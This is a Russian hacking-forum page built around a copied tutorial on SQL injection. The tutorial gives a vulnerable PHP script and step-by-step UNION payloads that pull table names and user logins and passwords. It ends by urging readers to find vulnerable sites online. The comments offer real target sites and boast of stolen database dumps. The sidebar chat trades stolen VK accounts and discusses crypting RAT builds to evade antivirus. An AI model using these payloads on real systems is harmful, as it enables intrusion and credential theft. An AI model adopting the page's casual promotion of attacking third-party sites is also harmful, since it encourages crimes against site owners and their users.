Для доступа к контенту сайта, пожалуйста отключите Аd-Blосk. При включенном блокираторе сайт может работать не корректно.

Реклама
Новые комментарии
  • just_ya
    Написал(а): just_ya
  • anonimka1337
    Написал(а): anonimka1337
    В новости: Unknown DoSer
  • legapilega
    Написал(а): legapilega
  • Hokki
    Написал(а): Hokki
  • MIISHA
    Написал(а): MIISHA
    В новости: DUBrute 2.1
  • MIISHA
    Написал(а): MIISHA
    В новости: RDP Forcer 1.4
Доска почёта
Посетители
Счётчики



ТИЦ сайта
Чат

Чтобы оставлять сообщения - зарегистрируйтесь
  • artyr1531
    16 янв 2017, 22:04
    Продам много валидных Аккаунтов для вк в лс цена 15р штука номе:пароль
    • sweetlou
      16 янв 2017, 20:36
      Народ, есть у кого 65р на кивос? До завтра
      • Hello3
        16 янв 2017, 19:22
        LazyPay 2017 Полностью Рабочий Писать в ЛС
        • alex_saratov
          16 янв 2017, 02:05
          Цитата: iDroid
          что за это будет, если я проигнорю

          посадят
          • iDroid
            15 янв 2017, 20:05
            что за это будет, если я проигнорю
            • iDroid
              15 янв 2017, 20:05
              Здравствуйте,

              Мы получили отчет (ы) , что ваш экземпляр EC2 (s)

              участвует в деятельности , которая напоминает атаку отказа в обслуживании против удаленных хостов; пожалуйста , ознакомьтесь с приведенной ниже информацией о деятельности.

              С уважением,
              AWS Злоупотребление

              Злоупотребление Номер дела: 10959553599-1

              --- Начало пересылаемой отчета (ов) ---

              * Log Extract:
              <<<
              ------------------- --------
              AWS счета: 846677771572
              Report время начала: 15-Jan-2017 9:18:34 UTC
              Отчет время окончания: 15-Jan-2017 9:19:34 UTC

              Протокол: TCP
              Удаленный IP: 141.8. 195,20
              Удаленный порт (ы): 80

              Общее количество байт , отправляемые: 17807550
              Всего пакетов отправлено: 356151
              Всего байт получен: 48015
              получил Всего пакетов: 1067

              >>>

              * Комментарий:
              <<<

              >>>

              Как я могу связаться с членом команды злоупотреблением Amazon EC2 или злоупотребления репортер?
              Ответьте на это письмо с оригинальной сюжетной линии.
              Amazon Web Services

              Amazon Web Services LLC является дочерней компанией Amazon.com, Inc. Amazon.com является зарегистрированной торговой маркой компании Amazon.com, Inc. Данное сообщение производятся и распространяются Amazon Web Services, LLC, 410 Terry Avenue North, Seattle, WA 98109- 5210.
              • iDroid
                15 янв 2017, 20:04
                Ребят
                • Kira_the_first
                  15 янв 2017, 17:19
                  @happyhacker1, а может и билд заодно залил, мы ж не знаем. + зная клиент не составит труда зделать билд, и детектить его(по сигнатурам клиента), тоесть что клиент что билд - один и тот же результат(палевность) но за разное время.
                  • happyhacker1
                    15 янв 2017, 17:05
                    @Kira_the_first, какой ты умный),я написал что чекнул клиент а не билд.
                    • Kira_the_first
                      15 янв 2017, 17:05
                      @happyhacker1, он не намекает, а говорит прямо, равно как и я. 56 авирей есть только на ВТ, и даже если ты будешь и дальше молчать, всё и так понятно, опровергать нечего. Ты идиот! И этим всё сказано.
                      • sweetlou
                        15 янв 2017, 16:27
                        @iDroid, я сразу антивирусным компаниям отсылаю. Через Почту России
                        • happyhacker1
                          15 янв 2017, 16:01
                          @iDroid, на меня намекаешь? думаешь я заливаю на вт крипт. билды?
                          • iDroid
                            15 янв 2017, 15:45
                            @Kira_the_first, теперь я знаю кто крипторы на вт заливает
                            • iDroid
                              15 янв 2017, 15:44
                              Продаю ключи от впн
                              1 - ключ 5 руб
                              2 - ключа 7 руб
                              10 - 20 руб
                              за подробностями писать в лс в вк vk.com
                              • pH 5.5
                                15 янв 2017, 12:43
                                Люди С Новым Годом ...- идите вы все куда небуть...за пивом нах пиздуйте
                                • happyhacker1
                                  15 янв 2017, 12:20
                                  @Kira_the_first, билды нет
                                  • Kira_the_first
                                    15 янв 2017, 12:04
                                    @happyhacker1, билд тоже должен всеми детектится......стоп, ты на ВТ проверяешь????
                                    • happyhacker1
                                      14 янв 2017, 20:43
                                      Клиент dark comet должен выдавать 45/56 по вирусам? То есть не сам билд,а именно клиент
                                      • bentley
                                        14 янв 2017, 20:27
                                        Ребята кто знает рабочий брут Дедиков? можете скинуть ссылку или направить на верный путь ! Спасибо!
                                        • nodens87
                                          14 янв 2017, 19:04
                                          @sweetlou, Она сама рисует.. я фотку закинул... она нарисовала. скидывала пару скринов рабочего процеса
                                          • anonimka1337
                                            14 янв 2017, 12:59
                                            У кого есть Devel studio ?
                                            • sweetlou
                                              14 янв 2017, 12:13
                                              @nodens87, Понимаю, рисовала бы сама, с 0. А рисовать по этому мануалу, каждый может.
                                              • nodens87
                                                14 янв 2017, 00:20
                                                кто знает какие то скрипты для для скрытия опасного кода и редирект через БЛОГЕР ком??
                                                • HANTOL
                                                  13 янв 2017, 22:49
                                                  @happyhacker1, нет
                                                  • iDroid
                                                    13 янв 2017, 22:31
                                                    куда залить закриптованый вирус, чтобы загрузки получить?
                                                    • sweetlou
                                                      13 янв 2017, 20:55
                                                      @happyhacker1, не в курсе :(
                                                      • happyhacker1
                                                        13 янв 2017, 20:43
                                                        @sweetlou, а те кто выложили софт,могут редактировать посты? например заменить ссылку
                                                        • sweetlou
                                                          13 янв 2017, 20:42
                                                          @happyhacker1, Вайс, вроде, раньше, чекал всё на склейку и прочий шлак. Неизвестно, перестал он чекать или нет.
                                                          • happyhacker1
                                                            13 янв 2017, 20:40
                                                            Насколько шанс встретить склейку здесь?
                                                            • sweetlou
                                                              13 янв 2017, 19:49
                                                              @nodens87, от дня до нескольких столетий. Т.к. на борд забили
                                                              Опрос на сайте
                                                              Как Вы нашли нас?
                                                              Поисковые системы
                                                              Порекомендовали
                                                              По ссылке с других сайтов
                                                              По ссылке с соц. сетей
                                                              Давно тут, по закладке
                                                              Ярлык в архиве с софтом
                                                              Случайно

                                                              Подписки

                                                                Получать новости на email:


                                                                Мы в соц. сетях:

                                                              Реклама

                                                              Последние сообщения с форума

                                                              Название темы Автор Статистика Последнее сообщение
                                                              База профилей+топики+гостевые+рефспам для Xrumer 12.ххх, регулярные обновления, скидки, бонусы.

                                                              Тема в разделе: Купля/Продажа

                                                              xrumer-master

                                                              Просмотров: 2748

                                                              Ответов: 37

                                                              Автор: xrumer-master

                                                              Сегодня, 03:50

                                                              раздача e-mail

                                                              Тема в разделе: Халява

                                                              admin

                                                              Просмотров: 1613240

                                                              Ответов: 3719

                                                              Автор: sanek64rus

                                                              Сегодня, 03:06

                                                              AgentVK-Музыка в вк.

                                                              Тема в разделе: Прочее

                                                              acsel29

                                                              Просмотров: 55

                                                              Ответов: 0

                                                              Автор: acsel29

                                                              Сегодня, 00:58

                                                              SQL-INJECTION
                                                              Автор: Abrazor | Дата: 5-07-2012, 19:15 | Комментариев: 17 | Просмотров: 7668
                                                              Уязвимость SQL-injection
                                                              Введение
                                                              В данной работе на примере исследуется уязвимость типа SQL Injection с использованием СУБД MySQL и PHP скриптов. Соответственно, для понимания происходящего требуются знания языка запросов SQL и языка php. После теоретической части будут приведены примеры кода и будет описано как все это можно проверить у себя на локальной машине с использованием комплекса DENWER под ОС Windows, хотя можно проделать тоже саоме и под другую ОС, например Linux, используя ту же базу данных MySQL. Т.е. для данного эксперимента потребуется:
                                                              Веб-сервер Apache
                                                              PHP, прикрученный к apache
                                                              СУБД MySQL
                                                              Атака типа SQL Injection — один из распространённых способов взлома сайтов и программ, работающих с базами данных, основанный на внедрении в запрос произвольного SQL-кода. Это атака, при которой производится вставка вредоносного кода в строки, передающиеся затем в базу MySQL, для синтаксического анализа и выполнения. Эта уязвимость может дать возможность атакующему выполнить произвольный запрос к базе данных (например, прочитать содержимое любых таблиц, удалить, изменить или добавить данные), получить возможность чтения и/или записи локальных файлов и выполнения произвольных команд на атакуемом сервере.
                                                              Основная форма атаки SQL Injection состоит в прямой вставке кода в пользовательские входные переменные, которые объединяются с командами SQL и выполняются. Менее явная атака внедряет небезопасный код в строки, предназначенные для хранения в таблице или в виде метаданных. Когда впоследствии сохраненные строки объединяются с динамической командой SQL, происходит выполнение небезопасного кода.
                                                              Атака осуществляется посредством преждевременного завершения текстовой строки и присоединения к ней новой команды. Поскольку к вставленной команде перед выполнением могут быть добавлены дополнительные строки, злоумышленник заканчивает внедряемую строку меткой комментария «--». Весь последующий текст во время выполнения не учитывается.
                                                              Пример использования
                                                              В качестве примера, приведу маленький php скриптик. В нем новости выводятся из базы данных и отображаются пользователям. Но есть одна интересная вещь. Достаточно давно в PHP появилась такая штука, как магические кавычки — эффект автоматической замены кавычки на обратный слэш и кавычку при операциях ввода/вывода в PHP. Это сделано как раз для избежания sql injection у начинающих программистов. По умолчанию в конфиге php.ini данная функция включена. Нам же, для упрощения проведения испытаний надо ее выключить:
                                                              magic_quotes_gpc = Off в файле php.ini
                                                              Далее приведен пример скрипта index.php, для которого и возможно провести исследование уязвимости.
                                                              <?php
                                                              //Настройки БД
                                                              $script['mysql_server']='localhost';//Хост
                                                              $script['mysql_login']='root';//Логин
                                                              $script['mysql_password']='';//Пароль
                                                              $script['mysql_db']='test';//Имя БД

                                                              //Сам скрипт
                                                              $body="";
                                                              $body.="<html>
                                                              <head><title>Новости</title></head>
                                                              <body>
                                                              ";

                                                              mysql_connect($script['mysql_server'], $script['mysql_login'], $script['mysql_password']) or die('Не могу подключиться к серверу');
                                                              mysql_select_db($script['mysql_db']) or die('Не могу подключиться к БД');

                                                              if(!empty($_GET['id']))//Вывод одной новости
                                                              {
                                                                  $body.="<h3>Просмотр новости</h3> \n<br>";
                                                                  $id=$_GET['id'];
                                                                  //$zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";
                                                                  //echo($id);
                                                                      //echo("<br>");   //  если это все раскомментировать то можно будет смотреть каким будет
                                                                      //echo($zapros);  //  запрос к базе, при изменения id в поле адреса браузера
                                                                      //echo("<br>");
                                                                  $zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";//Уязвимый запрос
                                                                  $result=mysql_query($zapros);
                                                                  echo(Mysql_error());//Вывод ошибки
                                                                  $data=mysql_fetch_row($result);
                                                                  //Вывод результата запроса
                                                                  $body.="Заголовок: <b>".$data['3']."</b>\n";
                                                                  $body.="<hr><pre>".$data['4']."</pre>\n";
                                                                  $body.="<hr>Добавленно ".$data['5']." ".$data['1']." в ".$data['2']."\n<br><br>";
                                                                  $body.="<a href='?'>Назад</a>";
                                                              }
                                                              else //Ну и простое отображение всех новостей(шоб понятней было где скуль)
                                                              {

                                                                  $body.="<h3>Все новости</h3> \n<br>";
                                                                  $zapros="SELECT * FROM news;";
                                                                  $result_z=mysql_query($zapros);
                                                                  $count_str=mysql_num_rows($result_z);
                                                                  for($i=1;$i<=$count_str;$i++)
                                                                  {
                                                                      [email protected]_fetch_assoc($result_z);
                                                                      $body.=$i.".<a href='?id=".$i."'>".$result['caption']."<a/><br>\n";
                                                                  }
                                                              }
                                                              $body.="</body></html>";
                                                              echo($body);
                                                              ?>

                                                              Далее приводится дамп базы данных test, из которой выбираются данные в этом скрипте. Тут есть 2 таблицы: users и news, из которых и выбираются данные в запросах.
                                                              CREATE TABLE `news` (
                                                                `id` int(11) NOT NULL DEFAULT '0',
                                                                `date` varchar(8) NOT NULL DEFAULT '',
                                                                `time` varchar(7) NOT NULL DEFAULT '',
                                                                `caption` varchar(50) NOT NULL DEFAULT '',
                                                                `text` text NOT NULL,
                                                                `avtor` varchar(50) NOT NULL DEFAULT ''
                                                              ) ENGINE=MyISAM DEFAULT CHARSET=cp1251;

                                                              INSERT INTO `news` VALUES (1, '01/04/09', '12:30', 'Превед :)', 'Хакнем скриптег! :)\r\nИ побыстрее а то малоли... :P', 'Бубл');
                                                              INSERT INTO `news` VALUES (2, '25/03/09', '11:10', 'БУгага', '=))) :))\r\nТолько за дизайн извиняюсь... както кривовато смотриться...', 'Бубл');

                                                              CREATE TABLE `users` (
                                                                `login` varchar(20) NOT NULL DEFAULT '',
                                                                `password` varchar(20) NOT NULL DEFAULT ''
                                                              ) ENGINE=MyISAM DEFAULT CHARSET=cp1251;

                                                              INSERT INTO `users` VALUES ('Admin', 'PaSsWoRd');
                                                              INSERT INTO `users` VALUES ('User', '123456');
                                                              INSERT INTO `users` VALUES ('Looser', 'big_password');

                                                              Методы проведения
                                                              Как определить данный баг
                                                              Это довольно таки просто. Надо вставлять во все поля, переменные, куки двойную и одинарные кавычки. Начнем с вот такого скрипта
                                                              http://test1.ru/index.php?id=1

                                                              Соответетвенно оригинальный запрос выглядит так:
                                                              SELECT * FROM news WHERE id='1';

                                                              Для наглядности расскоментируем в скрипте index.php строки, тогда вверх втраницы будет отображаться здачение id, передаваемое из адресной строки браузера и сам запрос к базе данных.
                                                              //$zapros="SELECT * FROM news WHERE id='".$_GET['id']."';";
                                                                  //echo($id);
                                                                      //echo("<br>");   //  если это все раскомментировать то можно будет смотреть каким будет
                                                                      //echo($zapros);  //  запрос к базе, при изменения id в поле адреса браузера
                                                                      //echo("<br>");

                                                              Теперь мы допишем кавычку в переменную "id", вот так
                                                              http://test1.ru/index.php?id=1'

                                                              если переменная не фильтруется и включены сообщения об ошибках то вылезет что то наподобие:
                                                              mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

                                                              Так как в запросе к БД будет присутствовать лишняя кавычка:
                                                              SELECT * FROM news WHERE id='1'';

                                                              Если отчет об ошибках выключен то в данном случае можно определить наличие уязвимости вот так:
                                                              http://test1.ru/index.php?id=1'; -- '

                                                              То есть запрос к БД станет вот таким:
                                                              SELECT * FROM news WHERE id='1'; -- '';

                                                              “--“ это знак начала комментария все после него будет отброшено, после него должен быть обязательно пробел и перед ним тоже). Таким образом для MYSQL запрос остается прежним и отобразиться тоже самое что и для
                                                              http://test1.ru/index.php?id=1

                                                              Как можно из этого извлечь что-то полезное
                                                              Для начала самое полезное это команда UNION. Модифицируем обращение к скрипту
                                                              http://test1.ru/index.php?id=1' UNION SELECT 1 -- '

                                                              Запрос к БД у нас получается вот таким:
                                                              SELECT * FROM news WHERE id='1' UNION SELECT 1 -- '';

                                                              Но есть одно ограничение -- количество столбцов до и после UNION должно быть одинаковым, соответственно его придется подбирать.
                                                              В нашем примере, как видно из дампа базы -- полей 6, соответственно нам подойдет
                                                              http://test1.ru/index.php?id=1' UNION SELECT 1,2,3,4,5,6 -- '

                                                              Результатом вывода такой команды будет то же что и должно выводиться без команды UNION. Но нам интересно увидеть какие-нибудь другие данные из базы, тогда заменим id=1 на id=-1 и продолжим. Причем заменять необязательно на -1, просто нужно выбрать такое значение которое не выбирается из БД, в нашем случае полей 6, так что может подойти любой значение больше 6 или меньше 1.
                                                              Рыщем по таблицам
                                                              Если есть доступ к INFORMATION_SCHEMA и если версия MYSQL >=5, то можно сделать так:
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 42,1 -- '';

                                                              Где 42,1 -- 42 - будет названием таблицы, причем нумерация идет с первой БД. Т.е. если есть несколько баз, то будут показываться таблицы из всех имеющихся баз данных -- нумерация сквозная. Естественно эти названия будут показываться в каком-то из полей вывода странички. Точнее они будут показываться в том поле, в которое мы поставили TABLE_NAME, то есть у нас название таблицы будет отображаться в поле номер 4, то есть вместо заголовка новости.
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 41,1 -- '';

                                                              Начиная с номера LIMIT 41,1 начинается искомая нами база данных test. Соответственно будут показываться названия таблиц базы данных в поле 4.
                                                              SQL-INJECTION

                                                              Если использовать такой запрос:
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 42,1 -- '';

                                                              То получим:
                                                              SQL-INJECTION

                                                              Так мы находим название таблицы. Далее находим названия полей и т.д. В результате можно получить какие-нибудь логины и пароли. На последнем этапе, зная названия таблиц и их полей можно сделать такой запрос. Мы попробуем просмотреть пользователей из таблицы users. Также можно было перебирать чтобы узнать названия полей таблицы, но мы сразу принали что это поля называются login и password.
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM users LIMIT 1,1 -- '


                                                              В результате видим:
                                                              SQL-INJECTION

                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM users LIMIT 2,1 -- '

                                                              В результате:
                                                              SQL-INJECTION

                                                              В результате выведутся login и password первого и второго пользователя. Они будут выводиться на тех местах, где должна изначально была выводиться информация из полей 3 и 4.
                                                              И самое интересное, если написать
                                                              http://test1.ru/index.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM users LIMIT 0,1 -- '

                                                              Так мы увидим:
                                                              SQL-INJECTION

                                                              В результате мы можем узнать данные, которые не отображаются на сайте. В данном примере мы посмотрели админский пароль и может продолжать веселье =).
                                                              Ну а проверить свои силы можно поставив у себя на ПК Денвер ну или же искать в инете сайты с уязвимостями er
                                                              Пароль на все архивы "happy-hack.ru" либо "hh"





                                                              Поделись:
                                                              Здесь присутствуют:
                                                              На данный момент новость никто не просматривает.
                                                              Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
                                                              Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: herionv
                                                              • Дата: 5 июля 2012 19:52
                                                              • Новостей: 1
                                                              • Комментариев: 54
                                                              можно взять парсер, NetDevilz SQL scanner и Havij и не заморачивать себе голову

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:18
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              Одно дело когда ты знаешь команды и как проводить атаку,а одно дело когда ты тыкнул на кнопку и оно 80%работы сделало тебе....ну вообщем палка двух концов...кому интересно тот почитает er

                                                              --------------------

                                                              Репутация: ( 2 )
                                                            • Offline Пользователь offline

                                                              • Написал: VADIMG
                                                              • Дата: 5 июля 2012 20:21
                                                              • Новостей: 1
                                                              • Комментариев: 19
                                                              +1, тема бестолковая, уже никто не раскручивает руками.

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:23
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              я еще раз говорю кому интересно как оно все происходит тот почитает ce

                                                              --------------------
                                                              Xaker2013 нравится это.
                                                              Copyright ©

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: Max7771
                                                              • Дата: 5 июля 2012 20:32
                                                              • Новостей: 0
                                                              • Комментариев: 15
                                                              Abrazor,
                                                              Прочитал))И это уже знал))Но всё равно уязвимые сайты найти не смогу, или руки кривые или не везёт, с Havij такая же проблема ни разу ещё нормально взлом не прошёл.
                                                              P.S троли уепитесь АПстену =) dm

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:35
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              Brutforce,
                                                              "некому" "тока" cap
                                                              ну и не удивительно что не интересно cv
                                                              а и забыл добавить,если тебе тема не интересна то не стоит писать в ней свои коменты которые больше похожи на кровавый высер педошкольника ei

                                                              --------------------

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 5 июля 2012 20:40
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              Max7771,
                                                              ну если хочешь скину в личку пару сайтов на которых на ура проводится скул инжектион? cd

                                                              --------------------

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: herionv
                                                              • Дата: 6 июля 2012 00:38
                                                              • Новостей: 1
                                                              • Комментариев: 54
                                                              я хоть и пользуюсь готовыми программами, но всё равно прочитал.

                                                              Репутация: ( 106 )
                                                            • Offline Пользователь offline

                                                              • Написал: admin
                                                              • Дата: 6 июля 2012 02:05
                                                              • Новостей: 381
                                                              • Комментариев: 1377
                                                              Статья заебца,если не копипаст.. notbad

                                                              Репутация: ( 106 )
                                                            • Offline Пользователь offline

                                                              • Написал: admin
                                                              • Дата: 6 июля 2012 02:18
                                                              • Новостей: 381
                                                              • Комментариев: 1377
                                                              Цитата: Max7771
                                                              Но всё равно уязвимые сайты найти не смогу, или руки кривые или не везёт

                                                              Братюнь,вот норм софтина,не один десяток дампов слито с её помощью если самому лень искать,просто выбираешь ключевик и парсишь поискоивк на уязвимости..

                                                              Репутация: ( 36 )
                                                            • Offline Пользователь offline

                                                              • Написал: Abrazor
                                                              • Дата: 6 июля 2012 16:44
                                                              • Новостей: 32
                                                              • Комментариев: 162
                                                              admin,
                                                              статейка копипаст okok
                                                              просто я по ней начал обучатся скул инжекту daaaaa

                                                              --------------------

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: Max7771
                                                              • Дата: 7 июля 2012 09:41
                                                              • Новостей: 0
                                                              • Комментариев: 15
                                                              admin,
                                                              Спасибо попробуем)))

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: kirkajkee
                                                              • Дата: 18 июля 2012 15:19
                                                              • Новостей: 0
                                                              • Комментариев: 11
                                                              admin, писани мне в асю 710554 я нашел пару десятков гудов, буду благодарен если научишь скл инъекции и поделюсь приват инфой))
                                                              ну или еще кто нибудь если хорошо шарит
                                                              так для общего развития хочется)

                                                              Репутация: ( 7 )
                                                            • Offline Пользователь offline

                                                              • Написал: sandra777
                                                              • Дата: 3 августа 2012 19:03
                                                              • Новостей: 15
                                                              • Комментариев: 117
                                                              Статья может быть и интересная, но сил до конца прочитать не хватает.

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: googlebot
                                                              • Дата: 4 августа 2012 17:16
                                                              • Новостей: 0
                                                              • Комментариев: 8
                                                              спасибо

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: Denemut
                                                              • Дата: 3 января 2013 03:28
                                                              • Новостей: 0
                                                              • Комментариев: 50
                                                              Пока в закладки, как время будет прочитаю чего там интересного есть :)

                                                              Репутация: ( 0 )
                                                            • Offline Пользователь offline

                                                              • Написал: SlendeR
                                                              • Дата: 20 декабря 2013 22:20
                                                              • Новостей: 0
                                                              • Комментариев: 26
                                                              Цитата: admin
                                                              Цитата: Max7771
                                                              Но всё равно уязвимые сайты найти не смогу, или руки кривые или не везёт

                                                              Братюнь,вот норм софтина,не один десяток дампов слито с её помощью если самому лень искать,просто выбираешь ключевик и парсишь поискоивк на уязвимости..

                                                              Чувак чувак чувак!!! Ты просто бог! Черт, я видос глядел, где эту софтину используют, а найти не мог! И тут искал, и везде как шнырь лазил... А попал сюда, почитал коммент, перешел по ссылке, и нашел! Черт, спасибо тебе что хуеву-тучу дней назад, ты написал этот коммент!!
                                                              Информация
                                                              Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.